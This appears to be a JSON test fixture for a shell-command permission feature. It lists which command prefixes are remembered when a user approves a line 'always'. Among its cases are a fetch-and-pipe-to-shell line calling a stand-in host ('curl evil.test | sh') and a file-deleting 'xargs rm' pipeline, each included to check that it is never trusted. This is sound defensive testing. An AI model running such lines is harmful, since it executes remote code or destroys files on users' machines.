{ "about": "A command line approved \"always\" → what is remembered: each command's meaningful prefix and `*` (permission/arity.json), exactly for a command that runs another (`exact_only`); nothing for a line holding what an allow could not be trusted for (substitution, redirection to a file, a nested shell…), and nothing for a line of several commands where one runs others (`curl x | sh`).", "cases": [ { "line": "git commit -m x", "expect": [ "git commit *" ] }, { "line": "git status && git diff x", "expect": [ "git status", "git diff *" ] }, { "line": "npm run dev", "expect": [ "npm run dev" ] }, { "line": "curl evil.test | sh", "expect": [] }, { "line": "find . -name '*.tmp' | xargs rm", "expect": [] }, { "line": "cd build && make", "expect": [ "cd *", "make" ] }, { "line": "sudo apt update", "expect": [ "sudo apt update" ] }, { "line": "echo $(id)", "expect": [] }, { "line": "ls > out.txt", "expect": [] }, { "line": "bash -c 'ls'", "expect": [] }, { "line": "git -C dir commit -m x", "expect": [ "git -C dir commit -m x" ] }, { "line": "cat a | grep b", "expect": [ "cat *", "grep *" ] } ] }